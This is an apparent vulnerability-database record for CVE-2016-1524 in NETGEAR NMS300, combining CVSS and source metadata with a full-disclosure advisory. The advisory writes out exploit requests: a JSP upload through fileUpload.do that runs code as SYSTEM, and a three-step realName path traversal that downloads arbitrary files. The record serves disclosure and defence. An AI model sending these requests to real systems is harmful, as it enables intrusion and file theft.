var-201602-0192
Vulnerability from variot
Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP file, and then accessing it via a direct request for a /null URI. A directory traversal vulnerability enables authenticated users to download arbitrary files. ( Dot dot ) including realName An arbitrary file may be read through the parameter. Supplementary information : CWE Vulnerability type by CWE-434: Unrestricted Upload of File with Dangerous Type ( Unlimited upload of dangerous types of files ) Has been identified. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable. >> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
Disclosure: 04/02/2016 / Last updated: 04/02/2016
Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."
Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker.
A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.
POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1 Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="name"
[name] ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]" Content-Type: application/octet-stream
<%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%>
Hello World ExampleA Hello World Example of JSP.
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--
2
Vulnerability: Arbitrary file download (authenticated) CVE-2016-1524 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13
Three steps need to be taken in order to exploit this vulnerability: a) Add a configuration image, with the realName parameter containing the path traversal to the target file: POST /data/config/image.do?method=add HTTP/1.1 realName=../../../../../../../../../../<file on C:>&md5=&fileName=&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla
b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1): POST /data/getPage.do?method=getPageList&type=configImgManager everyPage=10000
Sample response: {"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}
c) Download the file with the imageId obtained in step 2: GET /data/config/image.do?method=export&imageId=
Fix: No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks.
References: [1] https://www.kb.cert.org/vuls/id/777024
================ Agile Information Security Limited http://www.agileinfosec.co.uk/
Show details on source websiteEnabling secure digital business >>
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201602-0192",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prosafe network management system nms300",
"scope": "lte",
"trust": 1.6,
"vendor": "net gear",
"version": "1.5.0.11"
},
{
"model": "prosafe network management software 300",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "1.5.0.11"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netgear",
"version": null
},
{
"model": "management system nms300",
"scope": "lte",
"trust": 0.6,
"vendor": "netgear",
"version": "\u003c=1.5.0.11"
},
{
"model": "prosafe network management software 300",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "1.5.0.11"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-129"
},
{
"db": "NVD",
"id": "CVE-2016-1524"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:netgear:prosafe_network_management_software_300",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pedro Ribeiro of Agile Information Security.",
"sources": [
{
"db": "BID",
"id": "82630"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1524",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CVE-2016-1524",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.8,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2016-1524",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2016-00972",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "VHN-90343",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2016-1524",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-1524",
"trust": 1.6,
"value": "High"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1524",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2016-00972",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201602-129",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-90343",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-1524",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"db": "VULHUB",
"id": "VHN-90343"
},
{
"db": "VULMON",
"id": "CVE-2016-1524"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-129"
},
{
"db": "NVD",
"id": "CVE-2016-1524"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP file, and then accessing it via a direct request for a /null URI. A directory traversal vulnerability enables authenticated users to download arbitrary files. ( Dot dot ) including realName An arbitrary file may be read through the parameter. Supplementary information : CWE Vulnerability type by CWE-434: Unrestricted Upload of File with Dangerous Type ( Unlimited upload of dangerous types of files ) Has been identified. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. \nNetgear Management System NMS300 1.5.0.11 and prior are vulnerable. \u003e\u003e Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300\n\u003e\u003e Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)\n==========================================================================\nDisclosure: 04/02/2016 / Last updated: 04/02/2016\n\n\n\u003e\u003e Background on the affected product:\n\"NMS300\nProSAFE\u00ae Network Management System\nDiagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network.\"\n\n\n\u003e\u003e Summary:\nNetgear\u0027s NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. \n\nA special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. \nSo for example if [name] = \"testing\" and [extension] = \".jsp\", the final file will be named \"nulltesting.jsp\". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. \n\nPOST /lib-1.0/external/flash/fileUpload.do HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\n\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\nContent-Disposition: form-data; name=\"name\"\n\n[name]\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"whatever.[extension]\"\nContent-Type: application/octet-stream\n\n\u003c%@ page language=\"java\" contentType=\"text/html; charset=ISO-8859-1\"\npageEncoding=\"ISO-8859-1\"%\u003e\n\u003c!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n\u003chtml\u003e\n\u003chead\u003e\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=ISO-8859-1\"\u003e\n\u003ctitle\u003eHello World Example\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003ch2\u003eA Hello World Example of JSP.\u003c/h2\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--\n\n\n#2\nVulnerability: Arbitrary file download (authenticated)\nCVE-2016-1524\nAffected versions:\nNMS300 1.5.0.11\nNMS300 1.5.0.2\nNMS300 1.4.0.17\nNMS300 1.1.0.13\n\nThree steps need to be taken in order to exploit this vulnerability:\na) Add a configuration image, with the realName parameter containing the path traversal to the target file:\nPOST /data/config/image.do?method=add HTTP/1.1\nrealName=../../../../../../../../../../\u003cfile on C:\\\u003e\u0026md5=\u0026fileName=\u003cimagename.img\u003e\u0026version=1337\u0026vendor=Netgear\u0026deviceType=4\u0026deviceModel=FS526Tv2\u0026description=bla\n\nb) Obtain the file identifier (imageId) for the image that was created by scraping the page below for \"imagename.img\" (the fileName parameter in step 1):\nPOST /data/getPage.do?method=getPageList\u0026type=configImgManager\neveryPage=10000\n\nSample response:\n{\"page\":{\"beginIndex\":0,\"recordCount\":7,\"totalRecords\":7,\"currentPage\":1,\"everyPage\":10,\"totalPage\":1},\"list\":[{\"imageId\":\"1\",\"fileName\":\"agga5.img\",\"createTime\":\"10/03/2015 21:12:36\",\"realFileName\":\"../../../../../../../../../../log.txt\",\"vendor\":\"Netgear\",\"deviceType\":\"4\",\"deviceModel\":\"FS526Tv2\",\"version\":\"2323\",\"sizeM\":\"24491\",\"createBy\":\"admin\",\"createId\":\"1\",\"description\":\"bla\\r\\n\"}\n\nc) Download the file with the imageId obtained in step 2:\nGET /data/config/image.do?method=export\u0026imageId=\u003cID\u003e\n\n\n\u003e\u003e Fix: \nNo fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks. \n\n\n\u003e\u003e References:\n[1] https://www.kb.cert.org/vuls/id/777024\n\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business \u003e\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1524"
},
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"db": "BID",
"id": "82630"
},
{
"db": "VULHUB",
"id": "VHN-90343"
},
{
"db": "VULMON",
"id": "CVE-2016-1524"
},
{
"db": "PACKETSTORM",
"id": "135618"
}
],
"trust": 4.14
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-90343",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39412",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90343"
},
{
"db": "VULMON",
"id": "CVE-2016-1524"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#777024",
"trust": 5.2
},
{
"db": "NVD",
"id": "CVE-2016-1524",
"trust": 4.4
},
{
"db": "JVN",
"id": "JVNVU96743693",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "135618",
"trust": 1.3
},
{
"db": "EXPLOIT-DB",
"id": "39412",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201602-129",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-00972",
"trust": 0.6
},
{
"db": "BID",
"id": "82630",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-90343",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-1524",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"db": "VULHUB",
"id": "VHN-90343"
},
{
"db": "VULMON",
"id": "CVE-2016-1524"
},
{
"db": "BID",
"id": "82630"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"db": "PACKETSTORM",
"id": "135618"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-129"
},
{
"db": "NVD",
"id": "CVE-2016-1524"
}
]
},
"id": "VAR-201602-0192",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"db": "VULHUB",
"id": "VHN-90343"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00972"
}
]
},
"last_update_date": "2024-11-23T22:52:41.712000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NETGEAR Download Center - NMS300",
"trust": 1.6,
"url": "http://downloadcenter.netgear.com/en/product/NMS300#searchResults"
},
{
"title": "Patch for NetgearManagementSystemNMS300 arbitrary file upload vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/71362"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2016/02/07/no_patches_for_code_exec_holes_in_netgear_management_box/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"db": "VULMON",
"id": "CVE-2016-1524"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-22",
"trust": 0.8
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"db": "NVD",
"id": "CVE-2016-1524"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.5,
"url": "http://www.kb.cert.org/vuls/id/777024"
},
{
"trust": 4.2,
"url": "http://seclists.org/fulldisclosure/2016/feb/30"
},
{
"trust": 1.7,
"url": "http://downloadcenter.netgear.com/en/product/nms300#"
},
{
"trust": 1.6,
"url": "http://jvn.jp/vu/jvnvu96743693/"
},
{
"trust": 1.3,
"url": "https://www.exploit-db.com/exploits/39412/"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/archive/1/537446/100/0/threaded"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/135618/netgear-pro-nms-300-code-execution-file-download.html"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1525"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1525"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1524"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1524"
},
{
"trust": 0.3,
"url": "http://www.netgear.com"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/auxiliary/admin/http/netgear_auth_download"
},
{
"trust": 0.1,
"url": "https://www.theregister.co.uk/2016/02/07/no_patches_for_code_exec_holes_in_netgear_management_box/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1525"
},
{
"trust": 0.1,
"url": "http://[host]:8080/null[name].[extension]."
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-1524"
},
{
"trust": 0.1,
"url": "http://www.agileinfosec.co.uk/)"
},
{
"trust": 0.1,
"url": "http://www.agileinfosec.co.uk/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"db": "VULHUB",
"id": "VHN-90343"
},
{
"db": "VULMON",
"id": "CVE-2016-1524"
},
{
"db": "BID",
"id": "82630"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"db": "PACKETSTORM",
"id": "135618"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-129"
},
{
"db": "NVD",
"id": "CVE-2016-1524"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#777024"
},
{
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"db": "VULHUB",
"id": "VHN-90343"
},
{
"db": "VULMON",
"id": "CVE-2016-1524"
},
{
"db": "BID",
"id": "82630"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"db": "PACKETSTORM",
"id": "135618"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-129"
},
{
"db": "NVD",
"id": "CVE-2016-1524"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-03T00:00:00",
"db": "CERT/CC",
"id": "VU#777024"
},
{
"date": "2016-02-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"date": "2016-02-13T00:00:00",
"db": "VULHUB",
"id": "VHN-90343"
},
{
"date": "2016-02-13T00:00:00",
"db": "VULMON",
"id": "CVE-2016-1524"
},
{
"date": "2016-02-03T00:00:00",
"db": "BID",
"id": "82630"
},
{
"date": "2016-02-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"date": "2016-03-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"date": "2016-02-07T17:10:18",
"db": "PACKETSTORM",
"id": "135618"
},
{
"date": "2016-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-129"
},
{
"date": "2016-02-13T02:59:09.900000",
"db": "NVD",
"id": "CVE-2016-1524"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-04T00:00:00",
"db": "CERT/CC",
"id": "VU#777024"
},
{
"date": "2016-02-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-00972"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-90343"
},
{
"date": "2018-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2016-1524"
},
{
"date": "2016-07-05T21:22:00",
"db": "BID",
"id": "82630"
},
{
"date": "2016-02-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001517"
},
{
"date": "2016-03-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001708"
},
{
"date": "2016-03-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-129"
},
{
"date": "2024-11-21T02:46:36.043000",
"db": "NVD",
"id": "CVE-2016-1524"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-129"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear Management System NMS300 contains arbitrary file upload and path traversal vulnerabilities",
"sources": [
{
"db": "CERT/CC",
"id": "VU#777024"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-129"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.